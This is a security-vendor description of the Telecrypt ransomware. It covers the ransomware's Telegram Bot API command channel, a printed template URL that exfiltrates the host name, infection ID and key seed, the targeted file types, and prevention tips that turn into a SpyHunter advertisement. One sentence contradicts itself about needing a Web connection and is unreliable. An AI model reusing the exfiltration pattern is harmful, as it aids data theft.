Telecrypt Ransomware Description
The Telecrypt Ransomware has caught the attention of PC security analysts because it uses Telegram in its Command and Control server operations. The Telegram channels, which are known for offering secure communications to their users, are being used by the Telecrypt Ransomware as Command and Control servers in its attacks. Because of the Telecrypt Ransomware's reliance on the Telegram platform, the Telecrypt Ransomware attacks cannot be carried out with access to a Web connection on the infected computer. The Telecrypt Ransomware represents a significant threat to computer users, and PC security analysts strongly advise ensuring that all security software is fully up-to-date.
The Telegram that will Deliver Bad News
The people responsible for creating the Telecrypt Ransomware have coded this threat using Delphi. The Telecrypt Ransomware's binary file is 3 MB in size. After the Telecrypt Ransomware file is executed, it begins using Telegram to carry out its attack. The Telecrypt Ransomware abuses the Telegram API to connect from the infected computer to its server. The Telecrypt Ransomware carries out these communications before any of the victim's files are encrypted. To do this, the Telecrypt Ransomware creates a Telegram bot using the Telegram API. For each one that is created, the Telegram API creates a Token ID, which is used by this platform to carry out anonymous communications. To carry out this portion of its attack, the first thing the Telecrypt Ransomware does is to communicate with 'https://api.telegram.org/bot/GetMe' by using the bot Token that is hard coded into the Telecrypt Ransomware infection. The Telecrypt Ransomware does this to ensure that Telegram administrators have not intervened to remove the Telegram bot. After establishing the Telegram connection, the Telecrypt Ransomware will post a message to the Telegram channel, using the Telegram's own protocol. The ID of the channel used by the Telecrypt Ransomware is coded into this threat. The message follows the model:
https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >
The Telecrypt Ransomware will post information about the infected computer to the Telegram channel, as well as a seed number that is used to generate the Telecrypt Ransomware's encryption key. Once the Telecrypt Ransomware has carried out these operations, the Telecrypt Ransomware will begin encrypting the victim's files. The Telecrypt Ransomware does not encrypt a wide variety of files on the victim's computer, targeting only the following file types (which still have the potential to encrypt data that could be very valuable to the victim):
DOC, DOCX, XLS, XLSX, JPG, JPEG, PNG, DT, DBF, CD, PDF.
The Telecrypt Ransomware delivers its ransom note to the victim, with a message that says 'Thank you for helping Young Programmers Fund' and the payment method. The most common variant of the Telecrypt Ransomware uses the extension '.Xcri' to identify the files that have been encrypted during the attack.
Dealing with and Recovering from a the Telecrypt Ransomware Attack
Recovering from a Telecrypt Ransomware attack is no different than with other ransomware Trojans that are in the wild today. Computer users should establish strong preventive measures to ensure that they do not become victims of the Telecrypt Ransomware or other ransomware Trojan attacks. PC security analysts strongly advise that computer users take the following steps to ensure that they are well protected against encryption ransomware Trojans:
- Since the Telecrypt Ransomware and other encryption ransomware Trojans rely on taking the victim's files hostage for their attacks, having backups of all files is essential. This way, computer users can recover from an attack by simply restoring the affected files from a backup copy.
- A reliable security program that is fully up to date can prevent the Telecrypt Ransomware from being installed or from establishing unauthorized communications.
- Since the Telecrypt Ransomware may be delivered by corrupted email attachments, computer users are advised to take precautions whenever dealing with unsolicited email messages.
- Use an alternative browser. Malware may disable your browser. If you're using IE, for example, and having problems downloading SpyHunter, you should open Firefox, Chrome or Safari browser instead.
- Use a removable media. Download SpyHunter on another clean computer, burn it to a USB flash drive, DVD/CD, or any preferred removable media, then install it on your infected computer and run SpyHunter's malware scanner.
- Start Windows in Safe Mode. If you can not access your Window's desktop, reboot your computer in "Safe Mode with Networking" and install SpyHunter in Safe Mode.
- IE Users: Disable proxy server for Internet Explorer to browse the web with Internet Explorer or update your anti-spyware program. Malware modifies your Windows settings to use a proxy server to prevent you from browsing the web with IE.
Do You Suspect Your PC May Be Infected with Telecrypt Ransomware & Other Threats? Scan Your PC with SpyHunterSpyHunter is a powerful malware remediation and protection tool designed to help provide PC users with in-depth system security analysis, detection and removal of a wide range of threats like Telecrypt Ransomware as well as a one-on-one tech support service. Download SpyHunter's FREE Malware Remover
Security Doesn't Let You Download SpyHunter or Access the Internet?Solutions: Your computer may have malware hiding in memory that prevents any program, including SpyHunter, from executing on your computer. Follow to download SpyHunter and gain access to the Internet:
File System Details
This article is provided "as is" and to be used for educational information purposes only. By following any instructions on this article, you agree to be bound by the disclaimer. We make no guarantees that this article will help you completely remove the malware threats on your PC. Spyware changes regularly; therefore, it is difficult to fully clean an infected machine through manual means.